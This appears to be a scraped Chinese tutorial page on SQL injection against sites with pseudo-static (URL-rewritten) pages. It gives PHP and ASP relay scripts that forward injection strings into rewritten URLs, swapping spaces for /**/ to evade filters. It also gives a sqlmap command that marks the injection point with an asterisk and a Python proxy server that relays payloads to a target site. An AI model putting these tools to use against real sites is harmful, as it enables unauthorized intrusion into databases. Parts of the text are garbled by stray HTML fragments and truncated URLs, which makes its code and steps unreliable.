本文实例讲述了PHP针对伪静态的注入。分享给大家供大家参考,具体如下:
一:中转注入法
1.通过http://www.xxx.com/news.php"htmlcode">
<"id"]; $id=str_replace(” “,”%20″,$id); $id=str_replace(“=”,”%3D”,$id); //$url = "http://www.xxx.com/news.php/id/$id.html"; $url = "http://www.xxx.com/news.php/id/$id.html"; //echo $url; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); $output = curl_exec($ch); curl_close($ch); print_r($output); "htmlcode"><% JmdcwName=request("id") JmStr=JmdcwName JmStr=URLEncoding(JmStr) JMUrl="http://192.168.235.7:8808/ad/blog/" //实际上要请求的网址 JMUrl=JMUrl & JmStr&".html" //拼接url response.write JMUrl&JmStr //我这里故意输出url来看 'JmRef="http://127.0.0.1/6kbbs/bank.asp" JmCok="" JmCok=replace(JmCok,chr(32),"%20") JmStr=URLEncoding(JmStr) response.write PostData(JMUrl,JmStr,JmCok,JmRef) //url,查询字符串,cookie,referer字段 Function PostData(PostUrl,PostStr,PostCok,PostRef) Dim Http Set Http = Server.CreateObject("msxml2.serverXMLHTTP") With Http .Open "GET",PostUrl,False .Send () PostData = .ResponseBody End With Set Http = Nothing PostData =bytes2BSTR(PostData) End Function Function bytes2BSTR(vIn) //处理返回的信息 Dim strReturn Dim I, ThisCharCode, NextCharCode strReturn = "" For I = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn, I, 1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn, I + 1, 1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) I = I + 1 End If Next bytes2BSTR = strReturn End Function Function URLEncoding(vstrin) //发包前对参数的url编码一下 strReturn="" Dim i 'vstrin=replace(vstrin,"%","%25") '增加转换搜索字符, 'vstrin=Replace(vstrin,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20 'vstrin=Replace(vstrin,chr(43),"%2B") 'JMDCW增加转换+字符 vstrin=Replace(vstrin,chr(32),"/**/") '在此增加要过滤的代码 //这里很关键,方便啊,把空格自动换成/**/,后面会说到的 For i=1 To Len(vstrin) ThisChr=Mid(vstrin,i,1) if Abs(Asc(ThisChr))< &HFF Then strReturn=strReturn & ThisChr Else InnerCode=Asc(ThisChr) If InnerCode<0 Then InnerCode=InnerCode + &H10000 End If Hight1=(InnerCode And &HFF00) \&HFF Low1=InnerCode And &HFF strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1) End if Next URLEncoding=strReturn End Function %>二、手工注入法
1.http://www.xxx.com/play/Diablo.html
http://www.xxx.com/down/html/"font-size: medium">手工注入法(二)http://www.xxx.net/news/html/"font-size: medium">三、SQLmap方法
在sqlmap中伪静态哪儿存在注入点就加*
http://www.cunlide.com/id1/1/id2/2
python sqlmap.py -u “http://www.xxx.com/id1/1*/id2/2″
http://www.xxx.com/news/class/"font-size: medium">四、python脚本方法代码:
from BaseHTTPServer import * import urllib2 class MyHTTPHandler(BaseHTTPRequestHandler): def do_GET(self): path=self.path path=path[path.find('id=')+3:] proxy_support = urllib2.ProxyHandler({"http":"http://127.0.0.1:8087"}) opener = urllib2.build_opener(proxy_support) urllib2.install_opener(opener) url="http://www.xxx.com/magazine/imedia/gallery/dickinsons-last-dance/" try: response=urllib2.urlopen(url+path) html=response.read() except urllib2.URLError,e: html=e.read() self.wfile.write(html) server = HTTPServer(("", 8000), MyHTTPHandler) server.serve_forever()更多关于PHP相关内容感兴趣的读者可查看本站专题:《php程序设计安全教程》、《php安全过滤技巧总结》、《PHP运算与运算符用法总结》、《PHP网络编程技巧总结》、《PHP基本语法入门教程》、《php面向对象程序设计入门教程》、《php字符串(string)用法总结》、《php+mysql数据库操作入门教程》及《php常见数据库操作技巧汇总》
希望本文所述对大家PHP程序设计有所帮助。
标签:
PHP,伪静态,注入
免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件!
如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
桃源资源网 Design By www.nqtax.com
暂无“PHP针对伪静态的注入总结【附asp与Python相关代码】”评论...